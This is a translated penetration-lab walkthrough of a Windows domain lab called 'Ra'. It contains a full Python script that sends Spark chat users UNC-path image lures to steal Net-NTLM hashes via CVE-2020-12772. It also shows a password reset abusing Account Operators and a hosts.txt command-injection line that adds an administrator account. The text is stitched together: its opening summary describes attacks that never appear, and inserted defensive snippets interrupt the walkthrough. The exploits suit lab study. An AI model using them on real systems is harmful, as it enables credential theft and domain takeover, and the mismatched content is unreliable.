Article summary: This article records in detail an internal-network penetration exercise against the company WindCorp: external port scanning found the domain controller FIRE, a Kerberoasting attack yielded a service-account hash that was cracked, the resulting initial domain access was used to map domain relationships with BloodHound, and a DCSync attack finally obtained domain administrator rights, demonstrating the full chain from external entry point to complete control of the internal network. Overall score: 85. Article categories: internal penetration, red team, hands-on experience, vulnerability analysis, security tools.
Well, nothing there...
Let's reopen the website and take another look.
... the malicious UNC path.
- The attacker, over the internal network or in a group chat, sends the victim a message or image link that contains a malicious UNC path (pointing at an attacker-controlled internal host).
- When the victim's Spark 2.8.3 client tries to load or render that image, the Windows operating system automatically initiates an SMB request.
- In the process, the victim's machine automatically sends the Net-NTLM hash of the currently logged-in Windows user to the attacker's machine.
Vulnerability reference: https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
First flag obtained; moving on to lateral movement.
```
apple@macos security % smbclient //10.48.129.160/Users -U 'lilyle%ChangeMe#1234' -W windcorp.thm
Can't load /opt/homebrew/etc/smb.conf - run testparm to debug it
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun May 3 06:05:58 2020
.. DR 0 Sun May 3 06:05:58 2020
Administrator D 0 Sun May 10 19:18:11 2020
All Users DHSrn 0 Sat Sep 15 15:28:48 2018
angrybird D 0 Fri May 1 20:59:20 2020
berg D 0 Fri May 1 20:59:20 2020
bluefrog579 D 0 Fri May 1 20:59:20 2020
brittanycr D 0 Sun May 3 07:36:46 2020
brownostrich284 D 0 Fri May 1 20:59:20 2020
buse D 0 Tue May 19 20:15:06 2026
Default DHR 0 Fri May 1 07:35:11 2020
Default User DHSrn 0 Sat Sep 15 15:28:48 2018
desktop.ini AHS 174 Sat Sep 15 15:16:48 2018
edward D 0 Fri May 1 20:59:20 2020
freddy D 0 Sun May 3 07:30:16 2020
garys D 0 Fri May 1 20:59:20 2020
goldencat416 D 0 Tue May 19 21:46:06 2026
goldenwol D 0 Fri May 1 20:59:20 2020
happ D 0 Fri May 1 20:59:20 2020
happyme D 0 Fri May 1 20:59:20 2020
Luis D 0 Fri May 1 20:59:20 2020
orga D 0 Fri May 1 20:59:20 2020
organicf D 0 Fri May 1 20:59:20 2020
organicfish718 D 0 Tue May 19 21:41:59 2026
pete D 0 Fri May 1 20:59:20 2020
Public DR 0 Thu Apr 30 22:35:47 2020
purplecat D 0 Fri May 1 20:59:20 2020
purplepanda D 0 Fri May 1 20:59:20 2020
sadswan D 0 Fri May 1 20:59:20 2020
sadswan869 D 0 Tue May 19 21:41:23 2026
sheela D 0 Fri May 1 20:59:20 2020
silver D 0 Fri May 1 20:59:20 2020
smallf D 0 Fri May 1 20:59:20 2020
spiff D 0 Fri May 1 20:59:20 2020
tinygoos D 0 Fri May 1 20:59:20 2020
whiteleopard D 0 Fri May 1 20:59:20 2020
15587583 blocks of size 4096. 10795723 blocks available
smb: \>
```
Note the `buse` entry (`buse D 0 Tue May 19 20:15:06 2026`): this timestamp is very recent, while files in a lab environment are normally old. Inside an internal network, a user, folder or file that shows unusually frequent activity is a strong hint that the exercise is about NTLM-related material.
Accessing buse:
```
smb: \> cd buse
smb: \buse\> ls
NT_STATUS_ACCESS_DENIED listing \buse\*
smb: \buse\>
```
Restricted by an ACL (access control list): NT_STATUS_ACCESS_DENIED.
Tried several other users as well; all of them are restricted too.
So let's try CVE-2020-12772.
Attack path
```
[ Attacker (lilyle) ]
│
│ 1. Send chat message: <img src="\\ATTACKER_IP\share\test.jpg"> (XMPP port 5222)
▼
[ Openfire server ]
│
│ 2. Route and forward the message to the target user
▼
[ Victim client (Spark 2.8.3) ]
│
│ 3. Parse the HTML rich text and hand the UNC path down to Windows
▼
[ Victim Windows system ]
│
│ 4. SSO kicks in: automatic network authentication over SMB (SMB port 445)
▼
[ Attacker's listener (Responder) ] ───► [ Victim's Net-NTLMv2 hash captured! ]
```
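For the defending side of the chain above, here is an added example (not code from the original post or from Openfire/Spark): a filter that could run in an XMPP proxy or over Openfire message logs and flags chat stanzas whose `<img>` sources are UNC paths or `file://` URLs, the exact trigger that makes Windows send a Net-NTLM hash. The stanzas and the 10.0.0.99 address are constructed samples.

```python
import re
import xml.etree.ElementTree as ET

# Added example (not from the original post): a defender-side filter for XMPP
# chat stanzas that flags <img> sources pointing at UNC paths or file:// URLs,
# the trigger behind the Spark 2.8.3 forced-authentication bug. Sample stanzas
# are constructed; 10.0.0.99 is a placeholder address.

# src values that make Windows open an SMB session: \\host\..., //host/..., file:...
LEAK_SRC = re.compile(r'^\s*(\\\\[^\\/\s]+|//[^/\s]+|file:)', re.IGNORECASE)
IMG_TAG = re.compile(r'<img[^>]+src\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

def local_name(tag):
    """Strip the XML namespace prefix from an ElementTree tag name."""
    return tag.split('}')[-1].lower()

def find_img_sources(stanza_xml):
    """Return every <img src> in a stanza, whether the image arrives as a real
    XHTML-IM element or as escaped HTML text inside a plain <body>."""
    root = ET.fromstring(stanza_xml)
    srcs = [el.get('src') for el in root.iter()
            if local_name(el.tag) == 'img' and el.get('src')]
    for el in root.iter():
        if local_name(el.tag) == 'body' and el.text:
            srcs.extend(IMG_TAG.findall(el.text))
    return srcs

def inspect_stanza(stanza_xml):
    """Return ("block", offending_srcs) or ("allow", [])."""
    bad = [s for s in find_img_sources(stanza_xml) if LEAK_SRC.match(s)]
    return ("block", bad) if bad else ("allow", [])

# Constructed samples: XHTML-IM image with a UNC path, escaped HTML in a plain
# body carrying a file:// URL, and a benign HTTPS image.
XHTML_IM_STANZA = (
    '<message xmlns="jabber:client" to="buse@windcorp.thm" type="chat">'
    '<body>see attached</body>'
    '<html xmlns="http://jabber.org/protocol/xhtml-im">'
    '<body xmlns="http://www.w3.org/1999/xhtml">'
    '<img src="\\\\10.0.0.99\\share\\pic.jpg"/></body></html></message>')
ESCAPED_STANZA = (
    '<message xmlns="jabber:client" to="buse@windcorp.thm" type="chat">'
    '<body>&lt;img src="file://10.0.0.99/share/a.png"&gt;</body></message>')
BENIGN_STANZA = (
    '<message xmlns="jabber:client" to="buse@windcorp.thm" type="chat">'
    '<html xmlns="http://jabber.org/protocol/xhtml-im">'
    '<body xmlns="http://www.w3.org/1999/xhtml">'
    '<img src="https://intranet.windcorp.thm/logo.png"/></body></html></message>')
```

Blocking at the chat server only covers this one delivery path; egress filtering of SMB (TCP 445) to untrusted hosts is what stops the hash from leaving regardless of how the UNC path arrives.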
OK~
First, prepare a small script:
```python
import socket
import base64
import time


def send_spark_exploit():
    # ----------------- 1. Basic configuration -----------------
    TARGET_IP = "10.48.129.160"
    TARGET_PORT = 5222
    DOMAIN = "windcorp.thm"
    USERNAME = "lilyle"
    PASSWORD = "ChangeMe#1234"
    # Widen the net: add every polling bot in the lab that might be on duty to the send list
    TARGET_USERS = ["buse", "goldencat416", "organicfish718"]
    # The real VPN IP of your Mac on utun4
    YOUR_ATTACKER_IP = "192.168.132.34"
    # Upgraded payload: add proper HTML closing tags so the client renders the rich text cleanly
    PAYLOAD = f'<html><body><img src="\\\\{YOUR_ATTACKER_IP}\\share\\test.jpg" /></body></html>'

    # ----------------- 2. Loop: send the lure to each target -----------------
    for user in TARGET_USERS:
        print(f"\n[*] --------------------------------------------------")
        print(f"[*] Connecting to the Openfire channel -> target: {user} ...")
        # Open a raw TCP connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((TARGET_IP, TARGET_PORT))

            def recv_data():
                time.sleep(0.3)
                return s.recv(4096).decode('utf-8', errors='ignore')

            # --- Hand-rolled XMPP handshake ---
            # Step 1: open the XMPP stream
            init_stream = f'<stream:stream to="{DOMAIN}" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0">'
            s.send(init_stream.encode())
            recv_data()
            # Step 2: send a SASL PLAIN authentication request
            auth_str = f"\x00{USERNAME}\x00{PASSWORD}"
            auth_base64 = base64.b64encode(auth_str.encode()).decode()
            auth_packet = f'<auth xmlns="urn:ietf:params:xml:ns:xmpp-sasl" mechanism="PLAIN">{auth_base64}</auth>'
            s.send(auth_packet.encode())
            recv_data()
            # Step 3: after successful auth, restart the stream as the protocol requires
            s.send(init_stream.encode())
            recv_data()
            # Step 4: bind a resource identifier
            bind_packet = '<iq type="set" id="b1"><bind xmlns="urn:ietf:params:xml:ns:xmpp-bind"><resource>Spark</resource></bind></iq>'
            s.send(bind_packet.encode())
            recv_data()
            # Step 5: announce online presence
            s.send('<presence/>'.encode())
            recv_data()

            # --- The strike: send the rich-text injection payload ---
            print(f"[+] Authenticated! Sending the forced-authentication lure to {user} ...")
            msg_packet = f'<message to="{user}@{DOMAIN}" type="chat" id="exp"><body>{PAYLOAD}</body></message>'
            s.send(msg_packet.encode())
            time.sleep(0.5)
            print(f"[+] Lure for {user} sent.")
            s.close()
        except Exception as e:
            print(f"[-] Connection or send failed (target {user}): {e}")

    print("\n" + "=" * 50)
    print("[+] All lures sent! Now keep your eyes glued to the Responder window!")
    print("=" * 50 + "\n")


if __name__ == '__main__':
    send_spark_exploit()
```
The script still has quite a few problems, but Gemini's reply was rather cute; at least it delivered on the emotional support. A small PS:
Onto the domain controller:
```
*Evil-WinRM* PS C:\Users\buse\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============= ============================================
windcorp\buse S-1-5-21-555431066-3599073733-176599750-5777
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
WINDCORP\IT Group S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\buse\Desktop>
```
Account Operators: this means we can modify every account except the administrator accounts.
Two files were found under C:\scripts:
```
*Evil-WinRM* PS C:\scripts> ls
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2020 5:53 AM 4119 checkservers.ps1
-a---- 5/19/2026 9:01 AM 31 log.txt
*Evil-WinRM* PS C:\scripts>
```
checkservers.ps1 is a server-availability check script:
```
*Evil-WinRM* PS C:\scripts> type checkservers.ps1
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "[email protected]"
# specify where the notifications come from
$notificationfrom = "[email protected]"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"
# start looping here
Do{
$available = $Null
$notavailable = $Null
Write-Host (Get-Date)
# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
if($p)
{
# if the Host is available then just write it to the screen
write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
[Array]$available += $_
}
else
{
# If the host is unavailable, give a warning to screen
write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White
$p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue
if(!($p))
{
# If the host is still unavailable for 4 full pings, write error and send email
write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White
[Array]$notavailable += $_
if ($OutageHosts -ne $Null)
{
if (!$OutageHosts.ContainsKey($_))
{
# First time down add to the list and send email
Write-Host "$_ Is not in the OutageHosts list, first time down"
$OutageHosts.Add($_,(get-date))
$Now = Get-date
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
else
{
# If the host is in the list do nothing for 1 hour and then remove from the list.
Write-Host "$_ Is in the OutageHosts list"
if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut)
{$OutageHosts.Remove($_)}
}
}
else
{
# First time down create the list and send email
Write-Host "Adding $_ to OutageHosts."
$OutageHosts = @{$_=(get-date)}
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
}
}
}
# Report to screen the details
$log = "Last run: $(Get-Date)"
write-host $log
Set-Content -Path C:\scripts\log.txt -Value $log
Write-Host "Available count:"$available.count
Write-Host "Not available count:"$notavailable.count
Write-Host "Not available hosts:"
$OutageHosts
Write-Host ""
Write-Host "Sleeping $SleepTimeOut seconds"
sleep $SleepTimeOut
if ($OutageHosts.Count -gt $MaxOutageCount)
{
# If there are more than a certain number of host down in an hour abort the script.
$Exit = $True
$body = $OutageHosts | Out-String
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer
}
}
while ($Exit -ne $True)
*Evil-WinRM* PS C:\scripts> type"C:/scripts/log.txt"
Last run: 05/19/2026 09:03:23
*Evil-WinRM* PS C:\scripts>
```
Note this section:
```powershell
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
```
- Input source: the script reads C:\Users\brittanycr\hosts.txt. Our Account Operators membership lets us reset brittanycr's password and log in as her, which gives full control over the contents of **hosts.txt**.
- Code execution point: the script loops over the hostnames read with `get-content C:\Users\brittanycr\hosts.txt` and passes each one into `Invoke-Expression`. If malicious PowerShell is written into hosts.txt (abusing the way the value is interpolated into the command string), the script executes it directly.
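The root cause is that a data file is interpolated into a command string; as an added example (not part of the original post and not the lab's script), here is the input-side check a hardened version would apply to hosts.txt: every entry must be a bare RFC 1123 hostname or IPv4 literal, so a line carrying command fragments is reported instead of ever reaching the ping. The sample file contents are constructed.

```python
import re

# Added example (not part of the original post): a strict validator for the
# hosts.txt that checkservers.ps1 interpolates into an Invoke-Expression
# string. Each entry must be an RFC 1123 hostname or an IPv4 literal; anything
# else (a leading ';', spaces, quotes, other metacharacters) is rejected.
# The sample file contents are constructed.

LABEL = r'[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
HOSTNAME_RE = re.compile(rf'^(?:{LABEL}\.)*{LABEL}$')
OCTET = r'(?:25[0-5]|2[0-4]\d|1?\d?\d)'
IPV4_RE = re.compile(rf'^(?:{OCTET}\.){{3}}{OCTET}$')


def is_safe_host(entry):
    """True only for a bare hostname/FQDN or dotted-quad IPv4, <= 253 chars."""
    return len(entry) <= 253 and bool(HOSTNAME_RE.match(entry) or IPV4_RE.match(entry))


def validate_hosts_file(text):
    """Split one hosts.txt body into (accepted_hosts, rejected_lines).
    Blank lines and any line containing '#' are skipped, mirroring the
    script's own Where-Object {!($_ -match "#")} filter; everything else
    must be a plain host identifier, never a command fragment."""
    accepted, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or '#' in line:
            continue
        if is_safe_host(line):
            accepted.append(line)
        else:
            rejected.append((lineno, raw))
    return accepted, rejected


# Constructed sample: two legitimate entries, one commented out, and one line
# shaped like the injection the post describes (the page's injected line also
# starts with ';', which ends the Test-Connection statement early).
SAMPLE_HOSTS_TXT = """fire.windcorp.thm
# relay.windcorp.thm
10.48.129.160
;Write-Host injected
"""

if __name__ == '__main__':
    ok, bad = validate_hosts_file(SAMPLE_HOSTS_TXT)
    print("accepted:", ok)
    print("rejected:", bad)
```

In the script itself the matching fix is to drop `Invoke-Expression` and call `Test-Connection -ComputerName $_ -Count 1` directly, so a line from hosts.txt can only ever be treated as data; the validator above then catches malformed entries before they are used at all.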
```
*Evil-WinRM* PS C:\scripts> net user brittanycr NewPassword123! /domain
The command completed successfully.
*Evil-WinRM* PS C:\scripts>
```
Switch user:
```
apple@macos tryhackme % evil-winrm -i windcorp.thm -u buse -p 'NewPassword123!'
```
WinRM doesn't seem to let me log in, so I'm switching approach.
```
smbclient -U 'brittanycr' //windcorp.thm/Users
Can't load /opt/homebrew/etc/smb.conf - run testparm to debug it
Password for [WORKGROUP\brittanycr]:
Try "help" to get a list of possible commands.
smb: \brittanycr\> ls
. D 0 Sun May 3 07:36:46 2020
.. D 0 Sun May 3 07:36:46 2020
hosts.txt A 22 Sun May 3 21:44:57 2020
15587583 blocks of size 4096. 10788086 blocks available
smb: \brittanycr\>
```
Create a malicious hosts file locally, upload it and replace the original:
```
;net user asunb sdcds45QAdwd2e /add;net localgroup Administrators asunb /add
```
Try logging in with the new user:
```
apple@macos tryhackme % nxc smb windcorp.thm -u asunb -p 'sdcds45QAdwd2e'
SMB 10.48.129.160 445 FIRE [*] Windows 10 / Server 2019 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.48.129.160 445 FIRE [+] windcorp.thm\asuna:sdcds45QAdwd2e
apple@macos tryhackme % smbclient -U 'asunb' //windcorp.thm/Users
```
Since the user we created is in the Administrators group, we can read the flag directly.
Time to get some rest; happy 520 to all the masters.
Disclaimer:
The programs and techniques in this article are intended solely for lawful security research and teaching, with the aim of improving defensive capability; they are of a clearly technical research nature.
Any organization or individual that uses this content without authorization for attacks, sabotage or other illegal purposes bears sole responsibility for all resulting legal liability, civil damages and joint liability; this site accepts no joint liability.
Content on this site is published for technical exchange and knowledge sharing; for copyright or other objections, please contact us by e-mail via the contact link at the top of the page.
This article is reproduced from: 皇后红队 Asuna Asuna, 《【内网渗透】从域内凭据泄露到内网沦陷:Ra 靶场渗透全记录》 ([Internal Penetration] From in-domain credential leakage to full internal compromise: a complete walkthrough of the Ra lab).